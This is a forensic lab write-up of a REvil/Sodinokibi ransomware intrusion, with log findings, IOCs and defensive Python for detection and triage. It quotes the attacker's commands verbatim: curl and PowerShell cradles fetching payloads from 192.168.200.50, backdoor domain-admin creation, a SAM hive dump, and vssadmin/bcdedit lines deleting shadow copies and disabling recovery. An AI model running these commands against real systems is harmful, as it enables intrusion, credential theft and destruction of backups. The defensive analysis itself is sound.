DFIR Lab - REvil/Sodinokibi Ransomware Incident Response
Digital forensics and incident response lab investigating a REvil/Sodinokibi ransomware attack, covering initial access, privilege escalation, lateral movement, credential theft, and encryption using Splunk log analysis and malware analysis techniques.
Summary
This lab walks through the investigation of a REvil/Sodinokibi ransomware incident from initial access through full encryption. The attack began when a user executed a malicious .bat script extracted from a downloaded .zip file; the script fetched the first-stage payload from hXXp://192.168.200.50. The attacker escalated privileges with a UAC bypass (FodhelperBypass.ps1) and dumped credentials with Mimikatz.exe. Scvhost.exe and BLACKBOARDk35.exe were deployed as Sliver C2 stagers, PowerView from the PowerSploit framework was used for Active Directory enumeration, and SSDP multicast traffic on port 1900 marked the appearance of a new device on the network. The attacker created a backdoor domain admin account before deploying the ransomware payload, which ran as Rundl32.exe (a typosquat of the legitimate rundll32.exe) to encrypt files on the domain controller and workstation, delete volume shadow copies, disable boot recovery, and drop ransom notes.
IOCs and TTPs align with REvil/Sodinokibi ransomware.
Initial Access
The attack originated from a phishing lure delivered as a .zip archive containing a malicious batch script.
Kill chain:
- User downloaded `invoice.zip` from the internet (ZoneId=3 in the Zone.Identifier stream confirms internet origin)
- Archive extracted to reveal `invoice.bat`
- The `.bat` script used `curl` to download the Sliver C2 stager from the attacker's infrastructure
Key artifacts:
C:\Users\dwight\Downloads\d9e3d760-43ac-4239-9cd2-62962eff1195.tmp
C:\Users\dwight\Downloads\invoice.zip
C:\Users\dwight\Desktop\invoice.bat
Compromised host: WORKSTATION1 (192.168.200.12), user account dwight.
The batch script contained a curl command to retrieve scvhost.exe from the attacker’s server and execute it via cmd.exe:
curl hXXp://192.168.200.50/scvhost.exe -o scvhost.exe
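The ZoneId=3 evidence above comes from the Zone.Identifier alternate data stream that Windows attaches to downloads (Mark-of-the-Web). The parser below is an added example, not part of the original lab: it reads the INI-style stream, maps the zone number to its name, and flags the file as internet-sourced. SAMPLE_ADS is a constructed stream; its HostUrl and ReferrerUrl values are assumed, not taken from the lab's evidence.

```python
"""Parse a Zone.Identifier alternate data stream (Mark-of-the-Web).

Added example, not part of the original lab writeup. SAMPLE_ADS is a
constructed stream resembling what a browser writes next to a download; the
HostUrl and ReferrerUrl values are assumed, not taken from the lab's evidence.
"""
from typing import Dict, Optional

# URLZONE values used by Windows (the ZoneId key in the [ZoneTransfer] section).
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}

# Constructed: contents of invoice.zip:Zone.Identifier as a browser would write it.
SAMPLE_ADS = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=hXXp://192.168.200.50/\r\n"
    "HostUrl=hXXp://192.168.200.50/invoice.zip\r\n"
)


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Return the key=value pairs of the [ZoneTransfer] section (INI syntax)."""
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def describe(text: str) -> Dict[str, object]:
    """Summarise provenance: zone id/name, whether MotW marks it untrusted, source URLs."""
    fields = parse_zone_identifier(text)
    zone: Optional[int]
    try:
        zone = int(fields.get("ZoneId", ""))
    except ValueError:
        zone = None
    return {
        "zone_id": zone,
        "zone_name": ZONE_NAMES.get(zone, "unknown") if zone is not None else None,
        # Zones 3 (Internet) and 4 (Restricted) are what SmartScreen/Office treat as untrusted.
        "untrusted_origin": zone in (3, 4),
        "host_url": fields.get("HostUrl"),
        "referrer_url": fields.get("ReferrerUrl"),
    }


def read_zone_identifier(path: str) -> str:
    """Read the stream from an NTFS file. Windows only: '<path>:Zone.Identifier'
    names the alternate data stream."""
    with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
        return fh.read()


if __name__ == "__main__":
    print(describe(SAMPLE_ADS))
```

On a live Windows host the same stream is visible with `Get-Content .\invoice.zip -Stream Zone.Identifier`; Sysmon Event ID 15 (FileCreateStreamHash) records the stream creation, so the download-to-execution gap can be measured without the file itself.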
Privilege Escalation
The compromised user account already held local administrator privileges on the workstation. The attacker escalated to domain-level access through the following steps:
UAC Bypass
The attacker bypassed User Account Control with FodhelperBypass.ps1, pulled straight into memory with a PowerShell download cradle so the script itself never touched disk:
IEX (New-Object Net.WebClient).DownloadString("hXXp://192.168.200.50/FodhelperBypass.ps1")
The technique abuses fodhelper.exe, a Microsoft-signed binary that auto-elevates without a UAC prompt. Writing a command to the HKCU\Software\Classes\ms-settings\shell\open\command key (together with an empty DelegateExecute value) causes fodhelper to launch that command with high integrity. Because the key lives in HKCU, no elevation is needed to plant it, which also makes the write a reliable detection point (Sysmon Event ID 13 on that path).
Domain Admin Account Creation
The attacker created a new account and added it to Domain Admins as a persistent backdoor:
C:\Windows\system32\net1 user /add ad_service Password12345
C:\Windows\system32\net1 group "domain admins" ad_service /add /domain
Note that the user /add command carries no /domain switch, so it creates a domain account only when run on a domain controller; run anywhere else it creates a local account, and the group add that follows (which does specify /domain) would fail. Note also that net.exe hands most commands to net1.exe, so process-creation logs show net1 regardless of which binary was typed; detections should cover both.
Domain admin group membership was verified with:
C:\Windows\system32\net1 group "domain admins"
Registry Hive Backup
The attacker saved the SAM registry hive to a file named sam in the current working directory for offline credential extraction (reg save of hklm\sam requires administrator rights, consistent with the elevation above):
C:\Windows\system32\reg.exe save hklm\sam sam
The SAM hive alone is not enough: the hashes it holds are encrypted with the boot key kept in the SYSTEM hive, so an attacker working offline also needs hklm\system. No such save appears in the recovered command lines.
Credential Theft
The attacker deployed Mimikatz.exe to extract credentials from the LSASS process memory.
Key artifacts:
C:\users\public\mimi\mimikatz.exe
C:\Windows\system32\lsass.exe
Mimikatz opened a handle to lsass.exe to read NTLM hashes and Kerberos tickets from memory, plus plaintext passwords where WDigest caching is enabled. The tool was staged in C:\users\public\mimi\, a world-writable path not tied to any user profile that attackers commonly use to stage tooling.
Lateral Movement
The attacker performed network discovery and lateral movement using the following techniques:
SSDP Network Discovery
A newly joined device sent multicast discovery traffic: SSDP to 239.255.255.250 on UDP port 1900, plus the neighbouring link-local discovery protocols mDNS (224.0.0.251) and LLMNR (224.0.0.252). Windows hosts emit this traffic routinely, so on its own it is weak evidence of attacker activity; its value here is timing, since it marks the moment a new device appeared on the segment.
Active Directory Enumeration
The attacker used PowerView.ps1 from the PowerSploit framework to enumerate the Active Directory environment:
IEX (New-Object Net.WebClient).DownloadString("hXXp://192.168.200.50/PowerView.ps1")
PowerView provides extensive AD enumeration capabilities including user, group, computer, GPO, and trust enumeration without requiring any additional tooling on disk.
Reconnaissance Data Collected
- Usernames
- Machine names
- Domain name
- System language
- OS type
- CPU architecture
Data Exfiltration and Encryption
The second-stage payload, Rundl32.exe (a typosquat one letter short of the legitimate rundll32.exe), performed the following destructive actions:
Pre-Encryption Preparation
Volume shadow copies were deleted and automatic recovery was disabled in a single chained cmd.exe invocation: vssadmin removes every shadow copy, bcdedit recoveryenabled No turns off the Windows Recovery Environment on boot failure, and bootstatuspolicy ignoreallfailures suppresses the boot-failure prompt that would otherwise offer repair options:
C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
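Every step from the UAC bypass cradle through the account creation, the SAM hive save, the Mimikatz execution and the shadow-copy deletion above leaves a distinctive process command line. The rule set below is an added example, not part of the original writeup: a small detection engine run over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style fields). The command lines are the ones quoted in this writeup; the hosts they are attributed to, the powershell.exe wrapper around the IEX cradle, the image paths and the two benign events are assumptions made for illustration.

```python
"""Command-line detection rules for the techniques seen in this lab.

Added example, not part of the original writeup: a minimal rule engine run
over constructed process-creation events (Sysmon Event ID 1 / Security 4688
style fields). Command lines are the ones quoted in the writeup; hosts, image
paths, the powershell.exe wrapper and the benign events are assumptions.
"""
import re
from typing import Dict, List, NamedTuple


class Hit(NamedTuple):
    rule: str
    attack_id: str        # MITRE ATT&CK technique ID
    host: str
    command_line: str


# (rule name, ATT&CK ID, pattern matched against "<image> <command line>")
RULES = [
    ("curl_download_exe", "T1105",
     re.compile(r"\bcurl(\.exe)?\b.*\bh(xx|tt)ps?://\S+\.exe\b", re.I)),
    ("powershell_download_cradle", "T1059.001",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString", re.I)),
    ("fodhelper_uac_bypass", "T1548.002",
     re.compile(r"fodhelper", re.I)),
    ("user_account_added", "T1136",
     re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("added_to_domain_admins", "T1098",
     re.compile(r'\bnet1?(\.exe)?\s+group\s+"?domain admins"?\s+\S+\s+/add\b', re.I)),
    ("sam_hive_saved", "T1003.002",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("mimikatz_image", "T1003.001",
     re.compile(r"mimikatz", re.I)),
    ("shadow_copies_deleted", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("recovery_disabled", "T1490",
     re.compile(r"\bbcdedit\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
]

# Constructed events. Image paths and host attribution are assumed.
EVENTS: List[Dict[str, str]] = [
    {"host": "WORKSTATION1", "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl hXXp://192.168.200.50/scvhost.exe -o scvhost.exe"},
    {"host": "WORKSTATION1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('hXXp://192.168.200.50/FodhelperBypass.ps1')\""},
    {"host": "DC1", "image": r"C:\Windows\system32\net1.exe",
     "command_line": r"C:\Windows\system32\net1 user /add ad_service Password12345"},
    {"host": "DC1", "image": r"C:\Windows\system32\net1.exe",
     "command_line": r'C:\Windows\system32\net1 group "domain admins" ad_service /add /domain'},
    {"host": "DC1", "image": r"C:\Windows\system32\net1.exe",
     "command_line": r'C:\Windows\system32\net1 group "domain admins"'},      # query only
    {"host": "DC1", "image": r"C:\Windows\system32\reg.exe",
     "command_line": r"C:\Windows\system32\reg.exe save hklm\sam sam"},
    {"host": "WORKSTATION1", "image": r"C:\users\public\mimi\mimikatz.exe",
     "command_line": "mimikatz.exe"},
    {"host": "DC1", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    # Benign noise that the rules must not flag.
    {"host": "WORKSTATION1", "image": r"C:\Windows\system32\svchost.exe",
     "command_line": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"host": "DC1", "image": r"C:\Windows\system32\vssadmin.exe",
     "command_line": "vssadmin.exe list shadows"},
]


def detect(events: List[Dict[str, str]]) -> List[Hit]:
    """Run every rule over every event; one Hit per (event, rule) match."""
    hits: List[Hit] = []
    for ev in events:
        haystack = f"{ev.get('image', '')} {ev.get('command_line', '')}"
        for name, attack_id, pattern in RULES:
            if pattern.search(haystack):
                hits.append(Hit(name, attack_id, ev["host"], ev["command_line"]))
    return hits


def summarize(hits: List[Hit]) -> Dict[str, List[str]]:
    """Rule names that fired, per host, de-duplicated and sorted."""
    per_host: Dict[str, set] = {}
    for h in hits:
        per_host.setdefault(h.host, set()).add(h.rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


if __name__ == "__main__":
    for h in detect(EVENTS):
        print(f"[{h.attack_id}] {h.rule:28} {h.host:13} {h.command_line[:70]}")
    print(summarize(detect(EVENTS)))
```

The rules deliberately match net1 as well as net, and the image path as well as the command line, so Mimikatz renamed on the command line still fires on its on-disk name; the "domain admins" query without /add and the vssadmin list command are included to show the rules stay quiet on routine administration.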
Encryption
- All files on DC1 and WORKSTATION1 were encrypted
- Ransom notes were dropped in each directory
- Desktop wallpaper was changed to display the ransom demand
C2 Infrastructure
Sliver C2 Framework
The attacker used Bishop Fox’s Sliver command-and-control framework. Two implants were deployed:
| Implant | Host | Purpose |
|---|---|---|
| Scvhost.exe | WORKSTATION1 | Sliver C2 stager |
| BLACKBOARDk35.exe | DC1 | Sliver C2 stager |
Both binaries have different hashes but are functionally identical Sliver implants deployed under different filenames on each compromised host. Scvhost.exe is itself a typosquat of the legitimate svchost.exe, chosen to blend into a process list.
C2 callback: 192.168.200.50:8080
URL Generation
The ransomware component generated C2 URLs by combining hard-coded and random strings with domain names sourced from a configuration file embedded in the binary.
Tooling Summary
| Tool | Purpose |
|---|---|
| Scvhost.exe / BLACKBOARDk35.exe | Sliver C2 stager |
| Mimikatz.exe | Credential dumping (LSASS) |
| PowerView.ps1 | Active Directory enumeration |
| FodhelperBypass.ps1 | UAC bypass |
| Rundl32.exe | Ransomware payload execution |
| invoice.bat | Initial access dropper |
Malware Analysis
Analysis 1 - Rundl32.exe (Ransomware Payload)
| Property | Value |
|---|---|
| SHA256 | 15ef2d6ef402a46165be39d9dbc0081cf28ebca0f407306dd80ac3a73a32c07b |
| MD5 | b572a0486274ee9c0ba816c1b91b87c7 |
| VT Detection | 66/74 |
CAPA Findings:
- Anti-debugging techniques
- Shell code execution
- Data encryption using XOR, AES, RC4, Elliptic-Curve Cryptography, and Salsa20
- Data hashing using djb2
Dynamic Analysis:
- Ransomware iterates through all folders on the system
- Encrypts files in each directory
- Drops a ransom note in every folder
- Changes the desktop wallpaper to display ransom instructions
Analysis 2 - Sliver C2 Stagers
Scvhost.exe
| Property | Value |
|---|---|
| SHA256 | C93A0A916BD0DB48EA419204E74F2609EDF3B2FD39BB87A94B4E094B65A419DB |
| MD5 | 42618a07644aca3da05e912ef23c3227 |
BLACKBOARDk35.exe
| Property | Value |
|---|---|
| SHA256 | dbc72ca000494659f5ffd3b8994a73dd9c4abe622808fb2ed72238b44a0c7073 |
| MD5 | f5b6109d59f4c961b1bbf4bab7bc151e |
String Analysis:
- Sliver C2 protobuf references identified in binary strings
- Paths referencing github.com/bishopfox/sliver confirmed framework attribution
Network Analysis:
- Port 1900 SSDP traffic observed to 239.255.255.250 (multicast)
- C2 callback connection to 192.168.200.50:8080
Debugger Analysis:
- String github.com/bishopfox/sliver/implant/sliver_limits confirmed Sliver framework origin
Key finding: Despite different file hashes, Scvhost.exe and BLACKBOARDk35.exe are functionally identical Sliver implants compiled separately for deployment on DC1 and WORKSTATION1.
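The string and hash work above reduces to a repeatable triage step: hash the file, pull the Go package paths the compiler embeds, and check for Sliver markers. The script below is an added example, not part of the lab: SAMPLE_A and SAMPLE_B are constructed byte blobs that imitate two separate builds carrying the same Sliver package paths but differing elsewhere, which reproduces the key finding (same family, different hashes). They are not the real Scvhost.exe or BLACKBOARDk35.exe, and the marker list is the one the lab's string analysis reported plus Sliver's sliverpb protobuf package name.

```python
"""Static triage of suspected Sliver implants: file hashes plus Go package-path strings.

Added example, not part of the lab. SAMPLE_A and SAMPLE_B are constructed byte
blobs that imitate two separate builds embedding the same Sliver package paths
but differing elsewhere; they are not the real Scvhost.exe or BLACKBOARDk35.exe.
"""
import hashlib
import re
from typing import Dict, List, Set

# Strings the lab's analysis attributed to Sliver; sliverpb is Sliver's protobuf package.
SLIVER_MARKERS = ("github.com/bishopfox/sliver", "sliverpb", "sliver_limits")

# Go embeds the import paths of compiled packages; this pulls any github.com module path.
GO_PATH_RE = re.compile(rb"github\.com/[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-/]+")


def _fake_build(filler: bytes) -> bytes:
    """Constructed stand-in for a PE: MZ header, build-specific filler, Sliver paths."""
    return (b"MZ" + b"\x00" * 62 + filler
            + b"github.com/bishopfox/sliver/implant/sliver_limits\x00"
            + b"github.com/bishopfox/sliver/protobuf/sliverpb\x00"
            + b"\x00" * 16 + filler[::-1])


SAMPLE_A = _fake_build(b"A" * 40)                 # Scvhost.exe-like build (constructed)
SAMPLE_B = _fake_build(b"B" * 40 + b"\x90" * 8)   # BLACKBOARDk35.exe-like build (constructed)


def file_hashes(data: bytes) -> Dict[str, str]:
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def printable_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Same idea as `strings -n 6`: runs of printable ASCII of at least min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def go_package_paths(data: bytes) -> Set[str]:
    return {m.group().decode("ascii") for m in GO_PATH_RE.finditer(data)}


def sliver_markers_found(data: bytes) -> List[str]:
    strings = printable_strings(data)
    return sorted(m for m in SLIVER_MARKERS if any(m in s for s in strings))


def triage(data: bytes) -> Dict[str, object]:
    markers = sliver_markers_found(data)
    return {
        **file_hashes(data),
        "go_paths": sorted(go_package_paths(data)),
        "sliver_markers": markers,
        "is_sliver": "github.com/bishopfox/sliver" in markers,
    }


def same_family_different_build(a: bytes, b: bytes) -> bool:
    """True when both look like Sliver and share Go package paths but hash differently."""
    ta, tb = triage(a), triage(b)
    return bool(ta["is_sliver"] and tb["is_sliver"]
                and ta["sha256"] != tb["sha256"]
                and ta["go_paths"] == tb["go_paths"])


if __name__ == "__main__":
    for name, blob in (("SAMPLE_A", SAMPLE_A), ("SAMPLE_B", SAMPLE_B)):
        print(name, triage(blob))
    print("same family, different build:", same_family_different_build(SAMPLE_A, SAMPLE_B))
```

Because Sliver implants are Go binaries, the package-path comparison is a cheap way to tie two differently hashed samples to one build pipeline before spending time in a debugger; a packed or string-obfuscated build would defeat it, which is when the dynamic checks (the 192.168.200.50:8080 callback) carry the attribution instead.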
Indicators of Compromise
| Type | Value | Description |
|---|---|---|
| SHA256 | 15ef2d6ef402a46165be39d9dbc0081cf28ebca0f407306dd80ac3a73a32c07b | Rundl32.exe - REvil ransomware payload |
| SHA256 | C93A0A916BD0DB48EA419204E74F2609EDF3B2FD39BB87A94B4E094B65A419DB | Scvhost.exe - Sliver C2 stager |
| SHA256 | dbc72ca000494659f5ffd3b8994a73dd9c4abe622808fb2ed72238b44a0c7073 | BLACKBOARDk35.exe - Sliver C2 stager |
| MD5 | b572a0486274ee9c0ba816c1b91b87c7 | Rundl32.exe |
| MD5 | 42618a07644aca3da05e912ef23c3227 | Scvhost.exe |
| MD5 | f5b6109d59f4c961b1bbf4bab7bc151e | BLACKBOARDk35.exe |
| IP | 192.168.200.50 | Attacker payload server and C2 (callback on port 8080) |
| IP | 224.0.0.251 | mDNS multicast address (discovery traffic) |
| IP | 239.255.255.250 | SSDP multicast address (UDP 1900) |
| CVE | CVE-2018-8453 | Win32k elevation of privilege vulnerability |
| Filename | invoice.bat | Initial access dropper script |
| Filename | invoice.zip | Phishing lure archive |
| Filename | Scvhost.exe | Sliver C2 stager (WORKSTATION1) |
| Filename | BLACKBOARDk35.exe | Sliver C2 stager (DC1) |
| Filename | Rundl32.exe | Ransomware payload |
| Filename | Mimikatz.exe | Credential dumping tool |
| Filename | PowerView.ps1 | AD enumeration (PowerSploit) |
| Filename | FodhelperBypass.ps1 | UAC bypass script |
| URL | hXXp://192.168.200.50/scvhost.exe | Stager download URL |
| URL | hXXp://192.168.200.50/PowerView.ps1 | PowerView download URL |
| URL | hXXp://192.168.200.50/FodhelperBypass.ps1 | UAC bypass download URL |
| Registry | hklm\sam | SAM hive saved to disk for credential theft |